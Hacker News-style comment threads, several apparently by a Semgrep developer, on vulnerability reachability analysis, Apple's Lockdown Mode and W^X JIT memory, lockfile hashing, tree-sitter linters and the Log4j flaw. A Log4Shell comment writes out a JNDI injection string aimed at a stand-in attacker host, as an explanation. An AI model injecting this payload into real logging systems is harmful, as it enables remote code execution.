
Both Semgrep Supply Chain and govulncheck (AFAIK) are doing this work manually, for now. It would indeed be nice if the vulnerability reporting process had a way to provide metadata, but there's no real consensus on what format that data would take. We take advantage of the fact that Semgrep makes it much easier than other commercial tools (or even most linters) to write a rule quickly.

The good news is there's a natural statistical power-law distribution: most alerts come from a few vulnerabilities in the most popular (and often large) libraries, so you get significant lift just by writing rules for the most popular libraries first.


(Disclaimer: I work at Phylum, which has a very similar capability)

Not all of it has to be manual. Some vulnerabilities come with enough information to deduce reachability with a high degree of confidence using some slightly clever automation.

Not all vulns come with this information, but as time goes on the percentage that do is increasing. I'm very optimistic that automation + a bit of human curation can drastically improve the S/N for open source library vulns.

A nice property of this is: you only have to solve it once per vuln. If you look at the total set of vulns (and temporarily ignore super old C stuff) it's not insurmountable at all.


In what format is that information coming in? There are no function taints in GitHub's OSV data or NVD's data that I can see.


> Both Semgrep Supply Chain and govulncheck (AFAIK) are doing this work manually, for now.

Yeah, I get that, but surely you don't have 100% coverage. What does your code do for the advisories which you don't have coverage for? Alert? Ignore?


Since security vulnerability alerts are already created and processed manually (e.g., every Dependabot alert is triggered by some GitHub employee who imported the right data into their system and clicked "send" on it), adding an extra step to create the right rules doesn't seem impossibly resource-intensive. Certainly much more time is spent "manually" processing even easier-to-automate things in other parts of the economy, like payments reconciliation (https://keshikomisimulator.com/)


That would be 100% coverage, which is ideal but will take time to get to.


All the engine functionality is FOSS: https://semgrep.dev/docs/experiments/r2c-internal-project-de... (code at https://github.com/returntocorp/semgrep); but the rules are currently private (that may change in the future).

As with all other Semgrep scanning, the analysis is done locally and offline -- which is a major contrast to most other vendors. See #12 on our development philosophy for more details: https://semgrep.dev/docs/contributing/semgrep-philosophy/

Linking the relevant part of the changelog is a good idea -- others have also come out with statistical approaches based on upgrades other projects made (e.g., Dependabot has a compatibility score based on "when we made PRs for this on other repos, what % of the time did tests pass vs. fail").


Ah okay, thanks for the information.


We added support to the Semgrep engine for combining package metadata restrictions (from the CVE format) with code search patterns that indicate you're using the vulnerable library (we're writing those mostly manually, but Semgrep makes it pretty easy):

    - id: vulnerable-awscli-apr-2017
      pattern-either:
      - pattern: boto3.resource('s3', ...)
      - pattern: boto3.client('s3', ...)
      r2c-internal-project-depends-on:
        namespace: pypi
        package: awscli
        version: "<= 1.11.82"
      message: this version of awscli is subject to a directory traversal vulnerability in the s3 module
This is still experimental and internal (https://semgrep.dev/docs/experiments/r2c-internal-project-de...) but eventually we'd like to promote it and also maybe open up our CVE rules more as well!
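
To make the matching side concrete, here's a hypothetical Python snippet (the variable and bucket names are made up) that the `pattern-either` clauses above would flag -- and Semgrep would only report it as a finding if the scanned project also depends on an affected awscli version per the `r2c-internal-project-depends-on` block:

    import boto3

    # Both calls match the rule's code patterns; the finding fires only when
    # the project's dependencies also pin awscli <= 1.11.82.
    s3_client = boto3.client('s3')
    s3_bucket = boto3.resource('s3').Bucket('example-bucket')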


Here is a good writeup of some of the pros and cons of using a "reachability" approach.

https://blog.sonatype.com/prioritizing-open-source-vulnerabi...

>Unfortunately, no technology currently exists that can tell you whether a method is definitively not called, and even if it is not called currently, it’s just one code change away from being called. This means that reachability should never be used as an excuse to completely ignore a vulnerability, but rather reachability of a vulnerability should be just one component of a more holistic approach to assessing risk that also takes into account the application context and severity of the vulnerability.


Err, "no technology currently exists" is wrong, "no technology can possibly exist" to say whether something if definitively called.

It's an undecidable problem in any of the top programming languages, and some of the sub problems (like aliasing) themselves are similarly statically undecidable in any meaningful programming language.

You can choose between over-approximation or under-approximation.


I saw that Java support was still in beta. But it makes me wonder if it's going to come with a "don't use reflection" disclaimer, then...?


Notable highlights for me:

> Lockdown Mode is available in iOS 16 and coming soon in iPadOS 16 and macOS Ventura.

> Web browsing - Certain complex web technologies are blocked, which might cause some websites to load more slowly or not operate correctly. In addition, web fonts might not be displayed, and images might be replaced with a missing image icon.

The first sentence, I believe, is referring to disabling JIT (just-in-time compilation of JavaScript), which is dangerous as it allocates W+X pages which are often used by the final stage of an exploit. Apple already did an amazing job of hardening iOS by severely restricting which applications can use JIT (and this is their justification for why non-Safari browser engines are not allowed on iOS) and even enabling per-thread memory page permissions. Many more details are in this fantastic post from Google's Project Zero: https://googleprojectzero.blogspot.com/2020/09/jitsploitatio...

Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

My theory on this is that Apple is one of the few companies where everything they build seems to be well integrated into their ecosystem. This is part of their appeal.

Another part of Apple's appeal is that they've positioned themselves to appear as the company that cares the most about consumer privacy and security. Lockdown mode seems to be one of those features that's great for marketing and PR in certain circles, while being extremely useful in situations where it's needed.

I imagine someone writing an article claiming how lockdown mode saved them, and that's practically free viral marketing in the security circles.


> Lockdown mode seems to be one of those features that's great for marketing and PR in certain circles, while being extremely useful in situations where it's needed.

Also, it gives them additional room to play with security research and engineering at large. They already have an incentive to improve security on device (drive-by attacks, jailbreaking), and this just enables them to play with things that are safer but break too much. They’re basically training their other tech teams to be more secure, and to find where security and UX clash, identify and build the fix, even if it's off by default.


Also, and of course totally coincidental, it gives them a great justification for blocking other browsers.


Completely coincidental, I am sure.

Absolutely no one vendor can match Apple in security, ever.


You gotta admit, they do invest a ton of money into security. Mainly to keep consumers from running their own custom software on their devices. I guess that keeps out attackers too. But do keep in mind the user themself is probably part of Apple's threat model.


I don't care, as long as they make Lockdown Mode secure for my main app.

I'll get an Android phone if I want choices in situations where I don't need them.


Is there some angle for corporate phones too? If you’re a company and you’re going to buy a load of phones and you ask your cybersecurity department, I think they’d probably already tell you that iPhones are more secure. This just adds to it. Perhaps Apple are worried about, e.g., Pixel phones reliably getting security updates.


Same for Tesla's Bioweapon Defense Mode. Nearly nobody ever needs it but it gets them some low cost marketing / viral clicks.


> Bioweapon Defense Mode. Nearly nobody ever needs it

Raging wildfires causing smog all over the west coast beg to differ. Having built-in HEPA filtration is fantastic.


"Bioweapon defense mode" is a marketing ploy for "there's a HEPA cabin filter and a recirculation function", both of which a massive number of other cars on the market have both of as well.


You mean false advertising? Because unless it is an actual overpressure system, using compressed and probably stored air, that VX gas is getting in.

https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7158270/ "In principle, homes could be outfitted with High-Efficiency Particle (HEPA) filters, although this would require substantial modifications to most home heating, ventilation, and air conditioning (HVAC) systems and would require positive overpressure systems to prevent infiltration through cracks. However, hermetically sealed office buildings frequently have HEPA filters and positive overpressure HVAC systems, making it easier to ‘harden’ such buildings if they are likely targets of attack or if they perform critical functions in the midst of an emergency."


To be fair, it's advertised as a "bioweapon defense mode" and not a "chemical weapon defense mode".


Different take… Apple is going to push the idea wider and this is their test audience.

It wouldn’t surprise me if they anti-Googled it -- that is, instead of enforcing adoption of a web technology because they own the browser market, stopping all the misused technologies they don’t want to have to explicitly protect against.


Exactly, this is a business move to stop competitive advertising while they sell their own.


> which is dangerous as it allocates W+X pages which are often used by the final stage of an exploit

Are you sure? There's no need to ever have a page that is W and X at the same time, and I would not expect any current professional JIT to make one.


Thanks for the correction; my knowledge is a bit out of date. Firefox at least (not sure about Safari) switched to a W^X JIT a good while back: https://jandemooij.nl/blog/wx-jit-code-enabled-in-firefox/. That's cool.

W^X is more difficult to exploit for sure, but as other commenters point out, unfortunately still possible.


W^X is enforced for all processes on macOS on Apple Silicon.


Technically pages alternate between W and X as you say, but this will disable even that (which is already true AFAIK for non-Apple iOS apps, they can't have JITs).


They can’t have their own JIT. If you use SFSafariViewController or WKWebView you’re using Safari and its standard JIT. But you have no access to it outside normal JS so it’s no more exploitable than the Safari app would be.

I believe the JIT runs in its own process too.


There are still RWX pages in Chrome, something to do with WASM I think. I don’t know about Safari. Old MS Edge used to solve the remapping of the W JIT page to X by moving JITing to another process, keeping the page RW in that process but only ever RX in the primary process.


It doesn't have RWX pages on macOS; macOS on Apple Silicon (and under the Hardened Runtime on Intel, although I'm not sure whether or not Chrome's adopted that) strictly enforces W^X.

https://developer.apple.com/documentation/apple-silicon/port...


I just looked it up in the Armv8 manual and there is a control setting that makes the processor ignore the executable permissions for any writable pages. It states these controls ‘are intended to be used in systems with very high security requirements,’ which suggests there are drawbacks.

https://armv8-ref.codingbelief.com/en/chapter_d4/d44_1_memor...


The drawback is you have to rewrite some old code. I don't think there's anything else of note.

Maybe there are situations where switching permissions is too expensive in an unavoidable way, but that borders on a chip design problem...


My understanding is that trying to execute a page that's been written to is already insanely slow on essentially all modern processors, whether or not they care about security.


Makes sense, that would conflict with features like branch prediction.


Does the distinction matter? Is changing W pages into X pages meaningfully safer?


It depends on the kind of vulnerability. Say you have a vulnerability that allows writing to arbitrary pages; then an attacker on an RWX system can write malicious code into pages that would get executed. In a W^X environment, the attacker needs to find a W page and write to it before it becomes an X page.

This isn't a 100% mitigation, but it does make it harder to exploit.

JavaScript JITs have been the source of so many RCE vulnerabilities.
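
To make that concrete, here's a minimal sketch of the W^X discipline a JIT follows (my example, assuming Linux and CPython's mmap/ctypes; hardened macOS may refuse the execute flip without the JIT entitlement): generated code is written while the page is read+write, and only then is the page flipped to read+execute, so the same memory is never writable and executable at once.

    import ctypes, ctypes.util, mmap

    libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)

    # Map one page read+write only -- no execute bit yet.
    page = mmap.mmap(-1, mmap.PAGESIZE, prot=mmap.PROT_READ | mmap.PROT_WRITE)
    page.write(b"\xc3")  # stand-in for freshly generated machine code (x86-64 `ret`)

    # Only after writing do we flip the page to read+execute (W^X).
    # An RWX JIT would instead have mapped it writable *and* executable the
    # whole time -- exactly the page an arbitrary-write primitive wants.
    addr = ctypes.addressof(ctypes.c_char.from_buffer(page))
    libc.mprotect(ctypes.c_void_p(addr), mmap.PAGESIZE,
                  mmap.PROT_READ | mmap.PROT_EXEC)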


Yes. It means that you can’t use a write primitive to simply modify an already executable page.


How does that help?


It means an attacker with an arbitrary-write vuln needs to be able to target a page as the JITted code is being written to it, rather than being able to target any existing page with code in it.


And since JavaScript is so focused on a single thread, it’s easy to make sure it’s not even running at the same time your JIT code is doing those writes.


No, Apple uses mirror mappings or fast permission restrictions to flip the bits if available.


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users

Apple has been doing this for decades with heavy investment into assistive technology, far better than other platforms.


I was mucking about on my Mac the other day playing with the accessibility settings and came across this: https://support.apple.com/en-gb/guide/mac-help/mchlb2d4782b/... - a system that lets you move the mouse with movements of your head as picked up by the webcam. Works very well. Scrunch nose to click, etc.


Looking at you, Google. The only things they make are to spy more.


ChromeOS is among the most secure "daily-driver" operating systems and has been for years.


It's designed to make a computer secure against even physical access to the hardware, because ChromeOS systems are often used as work or school machines and need to be completely owned by the institution and immune to the actual user.


Apple isn’t much better. They just have better marketing.


Marginally better privacy, waaaaaaay better marketing.

Which is funny because google is the advertising company.


Google has great advertising - they are just not marketing TO you like Apple is :-D


very good point!


I mean, to be fair, Google grew up just trying to get us to click on things. Apple had to convince people to part with sums of money for lumps of metal and plastic with lightning in them.

Apple probably had a bigger budget for that sort of thing from the beginning, thus creating a proper culture. Google, probably not so much.


>Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

Getting world leaders, celebrities and CEOs to use their devices might make this part of their marketing budget.


I think the primary user base will be human rights activists and journalists, similar to Google’s Advanced Protection Program.


I don't think human rights activists and journalists are the most at risk here. They are more at risk than you and me, but at least they can keep a low profile.

CEOs and celebrities and politicians are not only at risk because of their influence and insider knowledge, but they also have a huge target painted on them at all times. They simply can't keep a low profile due to their occupation. They also have money, much more than journalists and activists, so they attract "regular" criminals too.

Human rights activists and journalists probably won't be their main user base, but they will be the most prominent for public relations reasons, because who doesn't like human rights and investigative journalism? VIPs are less marketable, and let's not talk about criminals. To keep things clear, I think it is a good feature, even if it can help criminals. After all, human rights activists are often technically criminals where they operate.


Many journalists' whole job is to not keep a low profile and to pull attention from the public. I'm not sure politicians get killed that much more in comparison [0]. Money is usually enough to solve political problems.

[0] https://www.euronews.com/green/2022/02/18/30-environmental-r...


> because who doesn't like human right and investigative journalism?

Everyone they're investigating. Here's a list of 51 journalists killed just this year https://cpj.org/data/killed/2022/?status=Killed&motiveConfir...


> targets human rights defenders, journalists, and dissidents

It’s literally spelled out as one of the target audiences in Apple’s press release announcing the feature.


I have yet to hear about NSO tools being used to target celebrities who are not activists. Activists are targeted all the time. For example, Mexico used its NSO install to target a person who was working to get a tax on sugar-sweetened beverages passed. And their children!

https://deibert.citizenlab.ca/2017/02/mexico-nso-group-and-t...


Journalists in Mexico have an extremely high murder rate, friend. It's definitely a serious risk.


I suspect this is a direct response to the NSO Group related hacks.


Considering NSO Group is specifically mentioned by name multiple times in Apple’s press release announcing Lockdown Mode, I’d say you’re right…

> Lockdown Mode offers an extreme, optional level of security for the very few users who, because of who they are or what they do, may be personally targeted by some of the most sophisticated digital threats, such as those from NSO Group and other private companies developing state-sponsored mercenary spyware.


I hadn’t thought of that but it’s an excellent observation and would make perfect sense.

Outside of that it’s kind of left-field and out of character for them to give users a way to make things work worse.


> Apple did an amazing job already of hardening iOS by severely restricting which applications can use JIT (and this is their justification for why non-Safari browser engines are not allowed on iOS)

I think it's probably inaccurate to conflate these two things: JIT wasn't even allowed in third-party browsers for a long time, despite their having to use Safari's engine, and Apple still didn't allow other browser engines. If this were the only reason, surely other browser engines without JIT would be fine?


Any Turing-complete interpreter written in a non-memory-safe language is a potential exploit vector; and browsers are full of them. The major browser engines all do their own font rendering, for just one example.

This is why the iOS App Store allows Swift Playgrounds (app with a memory-safe interpreter), and allows iSH Shell (virtualized POSIX environment, where you can write and run e.g. bash scripts), but doesn't allow iSH Shell to ship with gcc.


> but doesn't allow iSH Shell to ship with gcc.

That's just a business requirement on the App Store rather than a technical requirement. Nothing prevents you from installing iSH shell and then installing gcc yourself afterwards. In fact I have done so.

To summarize, Apple made a speed bump, not a wall.


iSH doesn’t ship with GCC because it is massive, not because Apple blocks it. In fact it would probably be easier for us to include it rather than deal with making the package available to be reviewed.


FWIW Swift Playgrounds actually does have an entitlement [1] which lets it run self-signed code

[1] https://news.ycombinator.com/item?id=22632692


Chrome and Chromium have flags to disable JIT as well, but there is definitely a significant performance penalty.

One area of greatest concern for me is client hints and the various JS APIs that leak way too much, from OS to memory and more. You would think that an extension as popular as uBlock Origin would exist to make this information as generic as possible and mimic the most common browser profile. Without it, it is still incredibly easy to identify a user with JS enabled, and unfortunately disabling JS also makes you unique.

This doesn't even address the Canvas API, which needs to be virtualized to protect privacy. The web standards as a whole haven't really put a lot of thought into privacy.


> Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users

Maybe Apple wants to encourage more (non-classified) government use of iPhones? Maybe they have a big juicy contract they could take if they just get their OS into the right shape for it?

Government purchase-orders used to be the main thing that kept RIM/Blackberry afloat: they were a Canadian manufacturer, and so were (or could be validated + closely scrutinized to be) trustworthy as a supplier for American government communications systems. This is 90% of why the Blackberry ecosystem was... the way that it was.

Apple is now in (nearly) the same position. And their ecosystem has also been strange for the last 6-or-so years, in that particular "there's no clear reason for this, unless the government asked you to do it for supply-chain-integrity purposes" way (e.g. a self-serve repair program that requires you to pre-register a device for repair before ordering parts, and then report the part IDs to initiate online pairing.)


Apple owns this market. They really are BlackBerry.

The niche they don’t play in is some police, inspector, and other outdoor jobs. The iPhone’s environmental operating range is too narrow.


>Overall it's very interesting to see Apple invest so significantly in something that will benefit relatively few users -- not that I'm complaining!

I would say that this is at the very least a strong marketing point. "We are secure by default, and the most secure phone out-of-the-box on the planet if needed".

The hardware itself must be trusted to an extent, too. Is there an Android-compatible device/ROM combination that can advertise the same level of security as this lockdown mode, without spending two days configuring it?


Google has advanced protection [1] which also extends into Android [2]. Setup is easy and fast.

In no way is this 'revolutionary' by Apple.

[1] https://landing.google.com/advancedprotection/

[2] https://support.google.com/accounts/answer/9764949?hl=en


Pixel with one of the security-focused ROMs, maybe?


> without spending two days configuring it?

TBH, if you have a target on your back, spending two days configuring your phone is a pretty small inconvenience.

On the other hand, if you're applying this without looking deeper into what it covers, what it doesn't, and its limits, you'll probably be in trouble sooner rather than later.


Part of the problem is difficulty, no? If it takes you two days to configure the phone to be safe, how sure are you that you’ve got every single option you had to change completely correct? That seems like a lot of possible mistakes.

“Slide this and cover practically everything built in” is a lot more reliable. You can still have problems (as always) with anything extra you install, like any system would.


I hear you, and think Apple’s defaults are useful, but under a set of conditions:

- you spent the time to know what they do, and how they work

- you set yourself at the right level of security

So you still need to be sure that Apple got every single option completely right for your use case in the configuration you chose.

That’s probably a one-time task, and once you understand what it does and where it protects you, you can just move the slider. But it can’t be a “no-brainer” where you just slide the thing.

I’d compare this to buying insurance: some will have 3 plans and you just choose one level, some have 250 options and you take hours or days going through each of them.

But whichever you choose, you’ll still spend a significant amount of time going through all the papers to even understand what the terms are and what you’re actually paying for. You wouldn’t want to be paying years of insurance only to realize at the worst time that the “just sign this” plan was partly incompatible with your health situation.


I appreciate your concern is genuine, but I think most of the people who benefit from this lockdown mode are mostly technically illiterate, and at the same time cash-strapped, unless they are journalists from well-funded media companies.

What these people need from the tech community is a foolproof, fail-safe way to turn the security level to the max.

What Apple just did goes in this direction. I hope Google can do the same.


Just wanted to say thank you for making this point. Far too many people on this site (and in tech in general) fall into this category: https://xkcd.com/2501/

People being targeted by the NSO Group are generally very smart, very educated people, but they're journalists, not digital security specialists. They may even know how to beat a tail, but they have no idea about MAC addresses. As someone who has been on both sides of the divide, just "flipping a switch" is a massive upgrade to the ability of reporters and activists to keep themselves and their contacts safe.


My bet is that long-term, Apple will build manufacturing in the US and Europe explicitly, and target government contracts for phones for officials.

A phone fully designed, developed, and assembled in the States with capacity to further lock down is a huge + for three letter agencies.


It's more or less impossible to do this. American workers on the Mac Pro line can't even screw in screws correctly.



Yes. GrapheneOS on a Pixel device.

https://grapheneos.org/


Remember when Tim Cook said he didn't care about the ROI when Apple spent millions making their devices more accessible?

Lockdown mode is quite similar in that thinking.

https://www.macobserver.com/tmo/article/tim-cook-soundly-rej...


During Apple’s annual meeting an activist asked Tim Cook to commit to doing only those things that are profitable. To which he responded: “When we work on making our devices accessible by the blind, I don’t consider the bloody ROI.”


>commit to doing only those things that are profitable

People that think like this are a danger to humanity.


It reads like a US Government RFP response to me.

Perhaps requested by Biden's Director of InfoSec?


> Apple did an amazing job already of hardening iOS by severely restricting which applications can use JIT

Well, they did that not because they care about users but because they want all software to pass through the App Store (and thus Apple's review and policies). If you allowed code from other sources to run efficiently (for example downloaded at runtime, put in a W+X memory page and executed), that code wouldn't pass through Apple's review process, so one could publish an app that does something and then modify its code to make it do another thing (even load an entirely different thing).

In the end I don't think this is a good thing for users.


Indeed this, it's more about platform control.

I really hope the EU will succeed in forcing Apple to allow third-party app stores. That would be a game changer. People who are happy to stay in the walled garden can simply not use any other app stores, but for someone like me it will open up iOS as an actual option I can choose. Right now there are too many things I can't do on iOS.

Though honestly, I'd be even happier with a real third option instead.


What do you need iOS to do?


I’d like to write an app for myself, sideload it, and not have Apple give me special permission to do what I want. Right now, I have to have a “shortcut” start my own app (for simming) to change some device settings, then remember to change them back after the session. But if Apple would allow you to do whatever you want without their permission (on your own device), my life would be a bit simpler.


This is great news! I like how the article cites evidence that MFA is disproportionately effective against account takeover.

If the RubyGems devs are looking for other highly effective wins against supply chain attacks: I think the next thing is deeper support for lockfiles. Although Ruby has Gemfile.lock, it's not a true lockfile in the same way as in the JavaScript/Go/Python ecosystems. Specifically, locking versions is optional, there's no locking by hash (GitHub issue: https://github.com/rubygems/rubygems/issues/3379), and there's no capability to lock local or source-only dependencies by hash. By comparison: go modules, pipenv, npm, yarn, nuget, composer, and gradle already support locking by hash.
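
For anyone unfamiliar with what hash locking buys you, here's a minimal sketch (the function name and chunking are mine, not any particular package manager's) of the check a hash-aware installer performs before unpacking a downloaded artifact:

    import hashlib

    def artifact_matches_lockfile(path: str, expected_sha256: str) -> bool:
        # Return True only if the downloaded file matches the digest recorded
        # in the lockfile -- a tampered or substituted package fails the check.
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                digest.update(chunk)
        return digest.hexdigest() == expected_sha256

If the registry (or a mirror, or a man-in-the-middle) serves different bytes than what was originally locked, the install fails instead of silently picking up the new content.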


You can add Cargo to that list as well.


This is a great article and I think tree-sitter's design choices are creating a budding ecosystem of new program analysis tooling. This article discusses the speed advantages, but I think the fact that tree-sitter is dependency-free (which the author's previous article did mention) is worth highlighting again.

For context, some of my teammates maintain the OCaml tree-sitter bindings and often contribute to grammars as part of our work on Semgrep (Semgrep uses tree-sitter for searching code and parsing queries that are code snippets themselves into AST matchers).

Often when writing a linter, you need to bring along the runtime of the language you're targeting. E.g., in Python, if you're writing a parser using the built-in `ast` module, you need to match the language version & features. So you can't parse Python 3 code with Pylint running on Python 2.7, for instance. This ends up being more obnoxious than you'd think at first, especially if you're targeting multiple languages.
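
As a tiny illustration of that coupling, here's a sketch of an `ast`-based check (flagging bare `eval` calls -- a made-up example, not a Semgrep rule). It parses with the running interpreter's grammar, so the Python version the linter itself runs on dictates which code it can analyze:

    import ast

    def find_eval_calls(source: str) -> list[int]:
        # Parses with the *running* interpreter's grammar -- e.g. match
        # statements only parse when this linter itself runs on 3.10+.
        tree = ast.parse(source)
        return [
            node.lineno
            for node in ast.walk(tree)
            if isinstance(node, ast.Call)
            and isinstance(node.func, ast.Name)
            and node.func.id == "eval"
        ]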

Before tree-sitter, using a language's built-in AST tooling was often the best approach because it is guaranteed to keep up with the latest syntax. IMO the genius of tree-sitter is that it's made it way easier than with traditional grammars to keep the language parsers updated.

Highly recommend Max Brunsfeld's Strange Loop talk if you want to learn more about the design choices behind tree-sitter: https://www.thestrangeloop.com/2018/tree-sitter---a-new-pars...


Many folks have often (correctly!) pointed out that each language's existing parsing packages will be more guaranteed to keep up with language changes. Our hope is that if we can get a critical mass of useful tools that all use tree-sitter under the covers, there will _also_ be incentives to ensure that the tree-sitter parser for each language stays up-to-date. And because of how tree-sitter grammars typically live in dedicated repos, that work might be done by external volunteers, and not by the core language developers.

Another benefit to our approach is that it should be much easier to adapt OP's linter to work with other languages, since in a sense it's “parameterized” by the language grammar and queries. If you use Python's `ast` module, you can't easily adapt that code to work on Go programs, for instance.


Hadolint is great! If you want to customize your lint logic beyond the checks in it, I recently wrote a Semgrep rule to require all our Dockerfiles to pin images with a sha256 hash that could be a good starting point: https://github.com/returntocorp/semgrep-rules/pull/1861/file...


Author here. The idea for this post came about after a HN reply (https://news.ycombinator.com/item?id=28965469) to one of my comments about the ua-parser-js issue. And the most recent trigger was a conversation with some Ruby developers about whether or not Gemfile.lock provided any security benefits (as you can see from the chart, bundler is an outlier compared to pip/npm/yarn). I wanted to collect the arguments for and against lockfiles and examine how widely the most critical features are supported; would love feedback on the arguments as well as whether I’ve gotten the details right on which package manager supports what.


If you are logging a user-controlled string, the user can provide a string that uses the JNDI URL schema like ${jndi:ldap://attackercontrolled.evil}. This will fetch and deserialize an arbitrary Java object, which can cause arbitrary code execution (ACE). Here's an explanation of how deserializing leads to ACE: https://vickieli.dev/insecure%20deserialization/java-deseria...

Another commenter states that after Java 8u191 arbitrary code execution isn't possible but you can get a pingback: https://news.ycombinator.com/item?id=29505027


Thank you for the explanation.

The mitigation seems to be disabling JNDI lookups. Wouldn’t it make more sense to disable parsing altogether? In what possible situation does anyone want their logging library to run eval(…) on arbitrary inputs?!


If you'd like to detect whether you're affected by this dynamically, it looks like https://github.com/google/tsunami-security-scanner-plugins/i... will eventually make it into Google's dynamic scanner: https://github.com/google/tsunami-security-scanner (I bet it would be easy to write a plugin for https://github.com/projectdiscovery/nuclei as well.)

To see if there are injection points statically, I work on a tool (https://github.com/returntocorp/semgrep) that someone else already wrote a check with: https://twitter.com/lapt0r/status/1469096944047779845 or look for the mitigation with `semgrep -e '$LOGGER.formatMsgNoLookups(true)' --lang java`. For the mitigation, the string should be unique enough that just ripgrep works well too.


The ActiveScan++ extension for Burp has been updated, but you need to do a manual update to get it:

https://github.com/PortSwigger/active-scan-plus-plus/commit/...

